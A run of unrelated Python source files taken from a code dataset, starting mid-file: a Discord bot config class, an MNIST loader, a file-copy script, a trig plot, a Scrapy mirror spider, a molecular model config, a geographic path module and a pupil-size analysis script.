Context, BadArgument\n\nfrom pymongo import ReturnDocument\n\nimport logging\nlog = logging.getLogger('Penelope')\n\nclass CogConfig(ABC):\n \"\"\"Uses python type hints to autofill the guild config for a cog\"\"\"\n _bot: Bot\n\n def __new__(cls):\n self = super().__new__(cls)\n self.type_hints = typing.get_type_hints(cls)\n del 
self.type_hints['_bot'] # ehh\n return self\n\n\n def __getattr__(self, name):\n if name == 'guild':\n return self._bot.get_guild(self._guild_id)\n\n if name in self.type_hints:\n hint = self.type_hints[name]\n param_id = self.__getattribute__(self._serialize_param(name))\n\n if typing.get_origin(hint) is list:\n hint = typing.get_args(hint)[0]\n return [self._get_param(p_id, hint) for p_id in param_id]\n\n return self._get_param(param_id, hint)\n\n\n def _get_param(self, param_id, hint):\n if hint is discord.TextChannel:\n return self._bot.get_channel(param_id)\n\n elif hint is discord.User:\n return self._bot.get_user(param_id)\n\n elif hint is discord.Role:\n return self.guild.get_role(param_id)\n\n elif hint is discord.Message:\n if not param_id:\n return None\n param = list(map(int, param_id.split(':')))\n return self._bot.get_channel(param[0]).fetch_message(param[1])\n\n else:\n log.warning(f'{self.__class__.__name__} - {hint} not implemented in __getattr__')\n\n\n @property\n def _embed(self) -> discord.Embed:\n e = discord.Embed(color=0xD81B60)\n e.title = f'{self.__class__.__name__}'\n return e\n\n\n async def handle_command(self, ctx: Context, *args):\n args = list(args)\n if not any(args):\n await self._send_params(ctx)\n\n else:\n param = args.pop(0)\n try:\n if param not in self.type_hints:\n raise BadArgument(f'`{param}` is not a valid config option')\n\n hint = self.type_hints[param]\n origin = typing.get_origin(hint)\n\n if origin is list:\n action = args.pop(0).strip()\n hint = typing.get_args(self.type_hints[param])[0]\n\n singlearg = await self._convert_argument(ctx, hint, args, param)\n\n arg = getattr(self, param)\n\n if action == 'add':\n if not singlearg in arg:\n arg.append(singlearg)\n\n elif action == 'remove':\n arg.remove(singlearg)\n\n else:\n raise BadArgument(f'Must use \\'add\\' or \\'remove\\' for List parameter {param}')\n\n else:\n arg = await self._convert_argument(ctx, hint, args, param)\n\n await self._update_config(param, arg)\n\n await ctx.send(embed=await self._single_param_embed(param))\n\n except BadArgument as e:\n await ctx.send(e)\n\n async def _single_param_embed(self, param):\n e = self._embed\n e.description = await self._render_param(param)\n return e\n\n async def _render_hint(self, param) -> str:\n hint = self.type_hints[param]\n origin = typing.get_origin(hint)\n if origin and issubclass(origin, Iterable):\n return f'**{param}** ({origin.__name__.capitalize()}[{typing.get_args(hint)[0].__name__}]):\\n'\n\n else:\n return f'**{param}** ({hint.__name__}) = '\n\n def _render_val(self, val) -> str:\n if isinstance(val, (discord.abc.Messageable, discord.Role)):\n return val.mention\n elif isinstance(val, discord.Message):\n return f'[Message]({val.jump_url})'\n else:\n return val\n\n async def _render_arg(self, param) -> str:\n arg = getattr(self, param)\n\n if inspect.iscoroutine(arg):\n arg = await arg\n\n if isinstance(arg, Iterable):\n return '\\n'.join([f'- {self._render_val(s)}' for s in arg])\n else:\n return self._render_val(arg)\n\n async def _render_param(self, param):\n return await self._render_hint(param) \\\n + str(await self._render_arg(param)) \\\n + '\\n'\n\n async def _send_params(self, ctx):\n e = self._embed\n e.title += ' \\N{WHITE HEAVY CHECK MARK}' if self.check else ' \\N{CROSS MARK}'\n e.description = ''\n\n for param, hint in self.type_hints.items():\n e.description += await self._render_param(param)\n\n e.description += ''\n await ctx.send(embed=e)\n\n async def _convert_argument(self, ctx, converter, args, param) 
-> Any:\n if converter is discord.Message:\n converter = discord.TextChannel\n\n if converter is str:\n args = ' '.join(args)\n else:\n args = args[0]\n\n converted = await ctx.command._actual_conversion(ctx, converter, args, param)\n\n if converter is discord.Message:\n return await converted.fetch_message(args[1])\n\n return converted\n\n def _make_key(self, param, hint):\n if issubclass(hint, discord.abc.Snowflake):\n return f'{param}_id'\n\n return f'{param}'\n\n def _serialize_param(self, param) -> dict:\n hint = self.type_hints[param]\n\n if typing.get_origin(hint) is list:\n hint = typing.get_args(hint)[0]\n\n return f'{self._make_key(param, hint)}s'\n\n return self._make_key(param, hint)\n\n def _make_val(self, val):\n if isinstance(val, discord.Message):\n return f'{val.channel.id}:{val.id}'\n\n if issubclass(type(val), discord.abc.Snowflake):\n return val.id\n\n return val\n\n def _serialize_arg(self, val):\n if isinstance(val, list):\n return [self._make_val(v) for v in val]\n\n return self._make_val(val)\n\n async def _update_config(self, param, arg) -> NoReturn:\n data = {f'{self.name}.{self._serialize_param(param)}': self._serialize_arg(arg)}\n\n doc = await self._bot.db.guild_config.find_one_and_update(\n {\"id\": self._guild_id},\n {\"$set\": data},\n upsert = True,\n return_document = ReturnDocument.AFTER\n )\n\n self.from_doc(doc)\n\n\n @classmethod\n async def from_db(cls, guild_id, bot):\n self = cls()\n self._guild_id = guild_id\n self._bot = bot\n\n doc = await bot.guild_config(guild_id)\n self.from_doc(doc)\n\n log.debug(f'{self.__class__.__name__} - Loaded guild \"{self.guild.name}\" ({self.guild.id}) config from db')\n\n return self\n\n\n def from_doc(self, doc: Dict) -> NoReturn:\n doc = doc.get(self.name, {})\n for param, hint in self.type_hints.items():\n param_id = self._serialize_param(param)\n\n if hasattr(self, param):\n default = getattr(self, param)\n elif typing.get_origin(hint) is list:\n default = []\n else:\n default = None\n\n arg = doc.get(param_id, default)\n\n setattr(self, param_id, arg)\n\n\n def __repr__(self):\n return f'<{self.__class__.__name__} {\" \".join([f\"{p}={getattr(self, p)}\" for p, h in self.type_hints.items()])}>'\n\n @property\n @abstractmethod\n def check(self):\n return self.enabled\n","sub_path":"cogs/utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"627356528","text":"from tensorflow.keras.datasets import mnist\nimport numpy as np\n\nclass DataLoader:\n def load(self, is_reshape=True, is_one_hot=False):\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n # convert\n x_train = self._normalize(x_train)\n x_test = self._normalize(x_test)\n if is_reshape:\n x_train = x_train.reshape(x_train.shape[0], -1)\n x_test = x_test.reshape(x_test.shape[0], -1)\n if is_one_hot:\n y_train = self._one_hot(y_train)\n y_test = self._one_hot(y_test)\n \n return (x_train, y_train), (x_test, y_test)\n\n def _one_hot(self, y_):\n one_hot = np.array([[int(i == y) for i in range(10)] for y in y_], dtype=float)\n return one_hot\n \n def _normalize(self, x_):\n return x_ / 255.0\n\n\n","sub_path":"mnist/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"542994355","text":"'''\r\nScript to compare files in two folders and copy those which are not overlapping.\r\n'''\r\nimport 
os\r\nimport shutil\r\nsource = \"Source Path\"\r\nfdir1 = os.listdir(\"folder1\")\r\nfdir2 = os.listdir(\"folder2\")\r\ndiff = list(set(fdir2) - set(fdir1))\r\nfor file in diff:\r\n shutil.copy(os.path.join(source, file), \"Destination Path\")\r\n","sub_path":"FileCompare.py","file_name":"FileCompare.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"247888445","text":"# -*- coding: utf-8 -*-\n\n'''\nName: Poojan Gajera\nStevens ID: 10432734\nCourse: FE 595\nHW: 01\nTitle: Python Refresher\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Taking values from 0 to 360 for the cycle of sine/cosine.\nperiod = np.arange(0,2*np.pi,0.01)\n\n# Sine, Cosine and tangent Graph\nsine = np.sin(period )\ncosine = np.cos(period )\ntan = np.tan(period)\n\n#plotting sin and cosine on the same axis\nplt.plot(period,sine,period,cosine,period,tan)\n\n##creating legends\nplt.subplot().legend(['Sine','Cosine','Tangent'])\n\nplt.subplot().axhline(y=0, color='k')\nplt.subplot().axvline(x=0, color='k')\nplt.savefig(\"graph.png\")\nplt.show()\n","sub_path":"10432734_HW_1_FE_595.py","file_name":"10432734_HW_1_FE_595.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"191831243","text":"#!/usr/bin/python\n#coding=utf-8\n# @hequan\n\nfrom scrapy.spiders import Spider, Rule\nfrom scrapy.selector import Selector\nfrom scrapy.linkextractors import LinkExtractor\nimport re\nimport requests\nfrom scrapy.spiders import CrawlSpider\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nfrom opensource_spider.items import OpensourceSpiderItem\n\nclass opensource_httpd_spider(CrawlSpider):\n # 爬虫的识别名称,必须是唯一的,在不同的爬虫中你必须定义不同的名字\n name = \"httpd_spider\" # 设置爬虫名称\n\n # 搜索的域名范围,也就是爬虫的约束区域,规定爬虫只爬取这个域名下的网页\n # http://mirrors.aliyun.com/apache/httpd/\n allowed_domains = [\"mirrors.aliyun.com\"] # 设置允许的域名\n\n # 爬取的url列表,爬虫从这里开始抓取数据,所以,第一次下载的数据将会从这些urls开始,其他子url将会从这些起始url中继承性生成\n start_urls = [\n 'http://mirrors.aliyun.com/apache/httpd/',\n ]\n\n # 解析的方法,调用的时候传入从每一个url传回的response对象作为唯一参数,负责解析并获取抓取的数据(解析为item),跟踪更多的url\n def parse(self, response):\n sel = Selector(response)\n items = []\n lvs_lists = sel.xpath('//a/@href').extract()\n for v in lvs_lists:\n if v == '../' or v == 'tmp/' or v == 'Name' or v == 'Last modified' or v == 'Description' or v == 'Parent Directory' or v == 'ChangeLog' or v == 'Size':\n continue\n\n item = OpensourceSpiderItem()\n item['orginname'] = v\n item['downurl'] = response.url + v\n item['filesize'] = 0\n items.append(item)\n\n return items\n\n\n","sub_path":"opensource_spider/spiders/opensource_httpd_spider.py","file_name":"opensource_httpd_spider.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"497990757","text":"\nimport pathlib\nimport typing\n\nfrom openff.nagl._base.base import ImmutableModel\nfrom openff.nagl.nn.gcn._base import _GCNStackMeta\nfrom openff.nagl.nn.activation import ActivationFunction\nfrom openff.nagl.features.atoms import DiscriminatedAtomFeatureType\nfrom openff.nagl.features.bonds import DiscriminatedBondFeatureType\nfrom openff.nagl.utils._types import FromYamlMixin\n\nAggregatorType = typing.Literal[\"mean\", \"gcn\", \"pool\", \"lstm\", \"sum\"]\nPostprocessType = typing.Literal[\"readout\", \"compute_partial_charges\", 
\"regularized_compute_partial_charges\"]\n\ntry:\n from pydantic.v1 import Field, validator\nexcept ImportError:\n from pydantic import Field, validator\n\nclass BaseLayer(ImmutableModel):\n \"\"\"Base class for single layer in the neural network\"\"\"\n hidden_feature_size: int = Field(\n description=(\n \"The feature sizes to use for each hidden layer. \"\n \"Each hidden layer will have the shape \"\n \"`n_atoms` x `hidden_feature_sizes`.\"\n )\n )\n activation_function: ActivationFunction = Field(\n description=\"The activation function to apply for each layer\"\n )\n dropout: float = Field(\n default=0.0,\n description=\"The dropout to apply after each layer\"\n )\n\n @validator(\"activation_function\", pre=True)\n def _validate_activation_function(cls, v):\n return ActivationFunction._get_class(v)\n\n\nclass ConvolutionLayer(BaseLayer):\n \"\"\"Configuration for a single convolution layer\"\"\"\n aggregator_type: AggregatorType = Field(\n default=None,\n description=\"The aggregator function to apply after each convolution\"\n )\n\n\nclass ForwardLayer(BaseLayer):\n \"\"\"Configuration for a single feedforward layer\"\"\"\n\n\nclass ConvolutionModule(ImmutableModel):\n architecture:typing.Literal[\"SAGEConv\", \"GINConv\"] = Field(\n description=\"GCN architecture to use\"\n )\n layers: typing.List[ConvolutionLayer] = Field(\n description=\"Configuration for each layer\"\n )\n\n\nclass ReadoutModule(ImmutableModel):\n pooling: typing.Literal[\"atoms\", \"bonds\"]\n layers: typing.List[ForwardLayer] = Field(\n description=\"Configuration for each layer\"\n )\n postprocess: typing.Optional[PostprocessType] = Field(\n description=\"Optional post-processing layer for prediction\"\n )\n\n # @validator(\"postprocess\", pre=True)\n # def _validate_postprocess(cls, v):\n # from openff.nagl.nn.postprocess import _PostprocessLayerMeta\n # if v is None:\n # return None\n # return _PostprocessLayerMeta._get_object(v)\n\n\nclass ModelConfig(ImmutableModel, FromYamlMixin):\n version: typing.Literal[\"0.1\"]\n atom_features: typing.List[DiscriminatedAtomFeatureType] = Field(\n description=\"Atom features to use\"\n )\n bond_features: typing.List[DiscriminatedBondFeatureType] = Field(\n description=(\n \"Bond features to use. 
\"\n \"Not all architectures support bond features\"\n )\n )\n convolution: ConvolutionModule = Field(\n description=\"Convolution config to pass molecular graph through\"\n )\n readouts: typing.Dict[str, ReadoutModule] = Field(\n description=\"Readout configs to map convolution representation to output\"\n )\n\n # @validator(\"atom_features\", \"bond_features\", pre=True)\n # def _validate_atom_features(cls, v, field):\n # if isinstance(v, dict):\n # v = list(v.items())\n # all_v = []\n # for item in v:\n # if isinstance(item, dict):\n # all_v.extend(list(item.items()))\n # elif isinstance(item, (str, field.type_, type(field.type_))):\n # all_v.append((item, {}))\n # else:\n # all_v.append(item)\n\n # instantiated = []\n # for klass, args in all_v:\n # if isinstance(klass, (AtomFeature, BondFeature)):\n # instantiated.append(klass)\n # else:\n # klass = type(field.type_)._get_class(klass)\n # if not isinstance(args, dict):\n # item = klass._with_args(args)\n # else:\n # item = klass(**args)\n # instantiated.append(item)\n # return instantiated\n \n def to_simple_dict(self):\n \"\"\"\n Create a simple dictionary representation of the model config\n\n This simplifies the representation of atom and bond features\n \"\"\"\n dct = self.dict()\n dct[\"atom_features\"] = tuple(\n [\n {f.feature_name: f.dict(exclude={\"feature_name\"})}\n for f in self.atom_features\n ]\n )\n\n dct[\"bond_features\"] = tuple(\n [\n {f.feature_name: f.dict(exclude={\"feature_name\"})}\n for f in self.bond_features\n ]\n )\n new_dict = dict(dct)\n for k, v in dct.items():\n if isinstance(v, pathlib.Path):\n v = str(v.resolve())\n new_dict[k] = v\n return new_dict\n \n @property\n def n_atom_features(self) -> int:\n \"\"\"The number of features used to represent an atom\"\"\"\n lengths = [len(feature) for feature in self.atom_features]\n n_features = sum(lengths)\n return n_features","sub_path":"openff/nagl/config/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"396833070","text":"from __future__ import annotations\nfrom typing import List, Generator, Union\nfrom datetime import datetime, timedelta\nimport pvlib as pv\nimport pandas as pd\nimport dataclasses\nimport numpy as np\nimport abc\n\n\n@dataclasses.dataclass()\nclass Path:\n points: List[pv.location.Location]\n timestamps: List[Union[pd.Timestamp, datetime]]\n\n @classmethod\n @abc.abstractmethod\n def create(cls, *args, **kwargs) -> LinearPath:\n pass\n\n @property\n def lats_lons(self) -> (List[float], List[float]):\n lats = [point.latitude for point in self.points]\n lons = [point.longitude for point in self.points]\n\n return lats, lons\n\n def __iter__(self) -> Generator[(pd.Timestamp, pv.location.Location), None, None]:\n yield from zip(self.timestamps, self.points)\n\n\nclass LinearPath(Path):\n @classmethod\n def create(cls, start_loc: pv.location.Location, end_loc: pv.location.Location,\n start_time: datetime, end_time: datetime,\n npoints=None) -> LinearPath:\n \"\"\"\n\n :param start_loc:\n :param end_loc:\n :param start_time:\n :param end_time:\n :param npoints: Number of points on the path. 
Defaults to None, for auto.\n :return:\n \"\"\"\n\n time_range = end_time - start_time\n\n if npoints is None: # automatically determine appropriate number of points\n npoints = int(time_range / timedelta(minutes=60))\n\n lats = np.linspace(start_loc.latitude, end_loc.latitude, npoints)\n\n lons = np.linspace(start_loc.longitude, end_loc.longitude, npoints)\n\n points = [pv.location.Location(lat, lon) for lat, lon in zip(lats, lons)]\n\n delta = time_range / npoints\n times = [start_time + (delta * n) for n in range(npoints)]\n\n return cls(points=points, timestamps=times)\n\n\n@dataclasses.dataclass()\nclass SegmentedPath(Path):\n segments: List[LinearPath] = dataclasses.field(default_factory=list)\n\n @classmethod\n def create(cls, start_loc: pv.location.Location, start_time: datetime) -> SegmentedPath:\n instance = cls([], [])\n instance.points = [start_loc]\n instance.timestamps = [start_time]\n return instance\n\n def append_point(self, loc: pv.location.Location, time: datetime, npoints=None):\n previous_loc = self.points[-1]\n previous_time = self.timestamps[-1]\n line = LinearPath.create(previous_loc, loc, previous_time, time, npoints=npoints)\n self.points.extend(line.points[1:])\n self.timestamps.extend(line.timestamps[1:])\n self.segments.append(line)\n\n","sub_path":"gui_and_analytics/analytics/location/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"533228489","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom jaratoolbox import loadbehavior\nimport os\nimport facemapanalysis as fmap\nimport sys\n\ndef onset_values(signalArray): \n\n '''\n Helps to find onset start values of the sync singal in any given array: \n Args: \n SignalArray (np.array) = array that contains data of the sync signal\n Returns:\n onsetStartValues (np.array) = an array of the indices containing the start onset values of the sync signal.\n ''' \n firstIndexValue = 0 \n lastIndexValue = len(signalArray)-1 \n stepNumber = 2\n startIndicesValues = range(firstIndexValue, lastIndexValue, stepNumber)\n startIndicesVec = np.array(startIndicesValues)\n onsetStartValues = np.take(signalArray, startIndicesVec)\n return (onsetStartValues)\n \ndef eventlocked_signal(timeVec, signal, eventOnsetTimes, windowTimeRange):\n '''\n Make array of signal traces locked to an event.\n Args:\n timeVec (np.array): time of each sample in the signal.\n signal (np.array): samples of the signal to process.\n eventOnsetTimes (np.array): time of each event.\n windowTimeRange (list or np.array): 2-element array defining range of window to extract.\n Returns: \n windowTimeVec (np.array): time of each sample in the window w.r.t. the event.\n lockedSignal (np.array): extracted windows of signal aligned to event. 
Size (nSamples,nEvents)\n    '''\n    if (eventOnsetTimes[0] + windowTimeRange[0]) < timeVec[0]:\n        raise ValueError('Your first window falls outside the recorded data.')\n    if (eventOnsetTimes[-1] + windowTimeRange[-1]) > timeVec[-1]:\n        raise ValueError('Your last window falls outside the recorded data.')\n    samplingRate = 1/(timeVec[1]-timeVec[0])\n    windowSampleRange = samplingRate*np.array(windowTimeRange) # units: frames\n    windowSampleVec = np.arange(*windowSampleRange, dtype=int) # units: frames\n    windowTimeVec = windowSampleVec/samplingRate # Units: time\n    nSamples = len(windowTimeVec) # time samples / trial\n    nTrials = len(eventOnsetTimes) # number of times the sync light went off\n    lockedSignal = np.empty((nSamples,nTrials))\n    for inde,eventTime in enumerate(eventOnsetTimes):\n        eventSample = np.searchsorted(timeVec, eventTime) # eventSample = index at which the sync turns on\n        thiswin = windowSampleVec + eventSample # indexes of window\n        lockedSignal[:,inde] = signal[thiswin]\n    return (windowTimeVec, lockedSignal)\n\n\ndef find_valid_windows(timeVec, eventOnsetTimes, windowTimeRange):\n    \"\"\"\n    Find windows that lie within the timeVec.\n    Args:\n        timeVec (np.array): time of each sample in the signal.\n        eventOnsetTimes (np.array): time of each event.\n        windowTimeRange (list or np.array): 2-element array defining range of window to extract.\n    Returns:\n        validWindows (np.array): array of booleans that is True if the window falls within.\n    \"\"\"\n    # A window is valid when it both starts and ends inside the recorded time range.\n    validWindows = np.logical_and(eventOnsetTimes + windowTimeRange[0] >= timeVec[0],\n                                  eventOnsetTimes + windowTimeRange[-1] <= timeVec[-1])\n    return (validWindows)\n\n\n\ndef eventlocked_signalold(timeVec, signal, eventOnsetTimes, windowTimeRange):\n    '''\n    Make array of signal traces locked to an event.\n    Args:\n        timeVec (np.array): time of each sample in the signal.\n        eventOnsetTimes (np.array): time of each event.\n        windowTimeRange (list or np.array): 2-element array defining range of window to extract.\n    Returns: \n        windowTimeVec (np.array): time of each sample in the window w.r.t. the event.\n        lockedSignal (np.array): extracted windows of signal aligned to event. 
Size (nSamples,nEvents)\n '''\n samplingRate = 1/(timeVec[1]-timeVec[0])\n windowSampleRange = samplingRate*np.array(windowTimeRange) # units: frames\n windowSampleVec = np.arange(*windowSampleRange, dtype=int) # units: frames\n windowTimeVec = windowSampleVec/samplingRate # Units: time\n nSamples = len(windowTimeVec) # time samples / trial\n nTrials = len(eventOnsetTimes) # number of times the sync light went off\n lockedSignal = np.empty((nSamples,nTrials))\n discards = [] #DB ADDED\n for inde,eventTime in enumerate(eventOnsetTimes):\n eventSample = np.searchsorted(timeVec, eventTime) # eventSample = index at which the synch turns on\n thiswin = windowSampleVec + eventSample # indexes of window\n if np.logical_and(np.min(thiswin) > 0, np.max(thiswin) < len(signal)): # DB ADDED\n lockedSignal[:,inde] = signal[thiswin] # DB ADDED\n else: # DB ADDED\n discards.append(inde) # DB ADDED\n lockedSignal_trim = np.delete(lockedSignal,discards,1) # DB ADDED\n return (windowTimeVec, lockedSignal_trim)\n \ndef find_prepost_values(timeArray, dataArray, preLimDown, preLimUp, postLimDown, postLimUp): \n \n ''' \n Obtain pupil data before and after stimulus \n Args: \n timeArray (np.array): array of the time window to evaluate pupil area obtained from event_locked \n dataArray (np.array): array of the pupil data obtained from event_locked function \n preLimDown (int or float): first number of the time interval to evaluate before stimulus onset \n preLimUp (int or float): second number of the time interval to evaluate before stimulus onset\n postLimDown (int or float): first number of the time interval to evaluate after stimulus onset \n postLimUp (int or float): second number of the time interval to evaluate after stimulus onset \n Returns: \n preData (np.array): array with the pupil data before stimulus \n postData (np.array): array with the pupil data after stimulus \n ''' \n preBool = np.logical_and(preLimDown <= timeArray, timeArray < preLimUp) \n postBool = np.logical_and(postLimDown <= timeArray, timeArray < postLimUp) \n preValuesIndices = np.argwhere(preBool == True) \n postValuesIndices = np.argwhere(postBool == True) \n preProcessedPreValues = dataArray[preValuesIndices] \n preProcessedPostValues = dataArray[postValuesIndices] \n preData = preProcessedPreValues.reshape(preValuesIndices.shape[0], dataArray.shape[1]) \n postData = preProcessedPostValues.reshape(postValuesIndices.shape[0], dataArray.shape[1]) \n return(preData, postData)\n\ndef freqs_and_meanParea(freqsArray, meanPareaVariable, freq1, freq2, freq3, freq4, freq5): \n '''\n Creates arrays containing the pupil area for each tested frequency\n Args:\n freqsArray (np.array): array containing the tested frequencies\n meanPareaVariable (np.array): array containing the average pupil size\n freq1..5 (int): frequencies tested\n \n returns:\n arrValues1..5 (np.array): one array per frequency tested (freq1..5) that contains the pupil size for the given frequency\n '''\n \n indicesFreq1 = np.argwhere(freq1 == freqsArray) \n indicesFreq2 = np.argwhere(freq2 == freqsArray)\n indicesFreq3 = np.argwhere(freq3 == freqsArray) \n indicesFreq4 = np.argwhere(freq4 == freqsArray) \n indicesFreq5 = np.argwhere(freq5 == freqsArray) \n newIndexArr1 = np.take(meanPareaVariable, indicesFreq1) \n newIndexArr2 = np.take(meanPareaVariable, indicesFreq2) \n newIndexArr3 = np.take(meanPareaVariable, indicesFreq3) \n newIndexArr4 = np.take(meanPareaVariable, indicesFreq4) \n newIndexArr5 = np.take(meanPareaVariable, indicesFreq5)\n arrValues1 = 
newIndexArr1.flatten()\n arrValues2 = newIndexArr2.flatten() \n arrValues3 = newIndexArr3.flatten() \n arrValues4 = newIndexArr4.flatten() \n arrValues5 = newIndexArr5.flatten()\n return(arrValues1, arrValues2, arrValues3, arrValues4, arrValues5)\n\n\ndef normalize_data(pupilArea, valuesToNormalize): \n minVal = np.amin(pupilArea) \n maxVal = np.amax(pupilArea) \n rangeValues = maxVal - minVal \n listData = [] \n for i in valuesToNormalize: \n substractMin = i - minVal \n newData = substractMin/rangeValues\n listData.append(newData) \n normalizedData = np.asarray(listData) \n return(normalizedData)\n\n \ndef comparison_plot(time, valuesData1, pVal): \n ''' \n Creates 1 figure with 3 plots \n Args: \n time = vector values for x axis \n valuesData1 (np.array) = vector values for y axis of the first plot \n valuesData2 (np.array)= vector values for y axis of the second plot\n valuesData3 (np.array)= vector values for y axis of the third plot\n returns: \n plt.show() = 1 figure with 3 plots using the input data \n ''' \n labelsSize = 16\n fig, subplt = plt.subplots(1,1)\n fig.set_size_inches(9.5, 7.5, forward = True)\n sp = np.round(pVal, decimals=17)\n label1 = filename,'pval:',sp\n \n subplt.plot(time, valuesData1, color = 'g', label = label1, linewidth = 4)\n\n subplt.set_xlabel('Time (s)', fontsize = labelsSize)\n subplt.set_ylabel('Pupil Area', fontsize = labelsSize)\n subplt.set_title('Pupil behavior: ' + filename, fontsize = labelsSize)\n plt.suptitle('Mouse = pure013. Data Collected 2022-07-01.', fontsize = labelsSize)\n plt.grid(b = True)\n #plt.ylim([550, 650])\n plt.xticks(fontsize = labelsSize)\n plt.yticks(fontsize = labelsSize)\n# plt.legend()\n #plt.legend(prop ={\"size\":10}, bbox_to_anchor=(1.0, 0.8))\n #plt.savefig('comparisonPure004Plot', format = 'pdf', dpi = 50)\n plt.show() \n return(plt.show())\n \ndef barScat_plots(firstPlotMeanValues1, firstPlotMeanValues2, xlabel1, xlabel2, firstPlotStdData1, firstPlotStdData2, pVal):\n '''\n Plot bar plots\n Args:\n MeanValues (int or float): number representing the average of the data to plot\n xlabel1 (string): name of the first condition to compare\n xlabel2 (string): name of the second condition to compare\n StdData (np.array): values to calculate the standard deviation from\n pVal (float or int): p-value for each one of the animals\n Returns:\n plt.show(): three bar plots within one figure\n '''\n barLabelsFontSize = 14\n meanPreSignal1 = firstPlotMeanValues1.mean(axis = 0) \n meanPostSignal1 = firstPlotMeanValues2.mean(axis = 0)\n preSignalStd1 = np.std(firstPlotStdData1) \n postSignalStd1 = np.std(firstPlotStdData2) \n barMeanValues1 = [meanPreSignal1, meanPostSignal1] \n stdErrors1 = [preSignalStd1, postSignalStd1] \n shortPval1 = np.round(pVal, decimals=3)\n pValue1 = 'P-value:', shortPval1\n dataPlot1 = [firstPlotMeanValues1, firstPlotMeanValues2] \n \n fig, barPlots = plt.subplots(1,1, constrained_layout = True, sharex = True, sharey = True)\n fig.set_size_inches(9.5, 7.5) \n barPlots.bar(xlabels, barMeanValues1, yerr = stdErrors1, color = 'g', label = pValue1) \n barPlots.errorbar(xlabels, barMeanValues1, yerr = stdErrors1, fmt='none', capsize=5, alpha=0.5, ecolor = 'black') \n barPlots.set_title(filename, fontsize = barLabelsFontSize)\n barPlots.set_ylabel('Pupil area', fontsize = barLabelsFontSize)\n barPlots.tick_params(axis='x', labelsize=barLabelsFontSize)\n #plotcolors = firstPlotMeanValues1 - firstPlotMeanValues2\n barPlots.plot(xlabels, dataPlot1, marker = 'o', c = 'k', alpha = 0.3, linewidth = 1)\n 
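    # the legend shows the Wilcoxon p-value label attached to the bars above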
barPlots.legend(prop ={\"size\":10})\n \n #plt.ylim(250, 800)\n plt.suptitle('pupil behavior across trials', fontsize = barLabelsFontSize)\n #plt.xlabel(\"common X\", loc = 'center')\n #plt.savefig(scatBarDict['savedName'], format = 'pdf', dpi =50)\n plt.show() \n return(plt.show())\n \ndef pupilDilation_time(timeData1, plotData1, pvalue):\n shortPval = np.round(pvalue, decimals = 6)\n lab = 'p-value', shortPval \n plt.plot(timeData1,plotData1, label = lab)\n plt.title('pure004_20220110_2Sounds: average pupil behavior') \n plt.ylabel('Pupil Area', fontsize = 13)\n plt.xlabel('Time(s)', fontsize = 13)\n plt.legend()\n plt.show() \n return(plt.show())\n\ndef PDR_kHz_plot(freqsArray, arrFreq1, arrFreq2, arrFreq3, arrFreq4, arrFreq5):\n labelsSize = 16\n fig, freqplt = plt.subplots(1, 1)\n fig.set_size_inches(9.5, 7.5, forward = True)\n label1 = filename\n \n meanPoint1 = arrFreq1.mean(axis = 0)\n meanPoint2 = arrFreq2.mean(axis = 0) \n meanPoint3 = arrFreq3.mean(axis = 0) \n meanPoint4 = arrFreq4.mean(axis = 0) \n meanPoint5 = arrFreq5.mean(axis = 0) \n valuesPlot = [meanPoint1, meanPoint2, meanPoint3, meanPoint4, meanPoint5]\n \n freqplt.plot(freqsArray, valuesPlot, marker = 'o')\n freqplt.set_title('Pupil size for 5 different frequencies: pure011_20220331', fontsize = labelsSize)\n freqplt.set_ylabel('Mean pupil Area', fontsize = labelsSize)\n freqplt.set_xlabel('Frequencies (kHz)', fontsize = labelsSize)\n plt.grid(b = True)\n plt.xticks(fontsize = labelsSize)\n plt.yticks(fontsize = labelsSize)\n plt.show() \n return(plt.show())\n# ---------------------------------------------------------------------------------------------------------------\n \n \n \n#--- loading data ---\nfileloc = '/home/jarauser/Desktop/danny_datacollection/dbtest3_pure013_2022-07-01'\nfilename = 'pure013_detectiongonogo_20220701a_dbtest3_proc.npy'\nproc = fmap.load_data(os.path.join(fileloc, filename), runchecks=False)\n\n#--- obtain pupil data ---\npArea = fmap.extract_pupil(proc)\n\n#---calculate number of frames, frame rate, and time vector---\nnframes = len(pArea) # Number of frames.\nframeVec = np.arange(0, nframes, 1) # Vector of the total frames from the video.\nframerate = 30 # frame rate of video\ntimeVec = frameVec / framerate # Time Vector to calculate the length of the video.\n\n#--- obtain values where sync signal turns on ---\n_, syncOnsetValues, _, _ = fmap.extract_sync(proc)\ntimeOfSyncOnset = timeVec[syncOnsetValues] # Provides the time values in which the sync signal turns on.\n\n#--- Align trials to the event ---\ntimeRange = np.array([-0.5, 2.0]) # Range of time window\n# run function you're creating, to restrict trials to valid trials: timeofSyncOnset[bool] \nwindowTimeVec, windowed_signal = eventlocked_signal(timeVec, pArea, timeOfSyncOnset, timeRange)\n\n\n# TO SHOW SANTIAGO:\nprint('time of last sync light:')\nprint(timeOfSyncOnset[-1])\nprint('total time of recording:')\nprint(np.max(timeVec))\nprint('total number of sounds played (times sync light blinked):')\nprint(syncOnsetValues.shape)\nprint('total number of trials included in the analysis:')\nprint(windowed_signal.shape[1])\n\n\n#sys.exit() \n\n#--- Obtain pupil pre and post stimulus values, and average size ---\n#find_prepost_values(timeArray, dataArray, preLimDown, preLimUp, postLimDown, 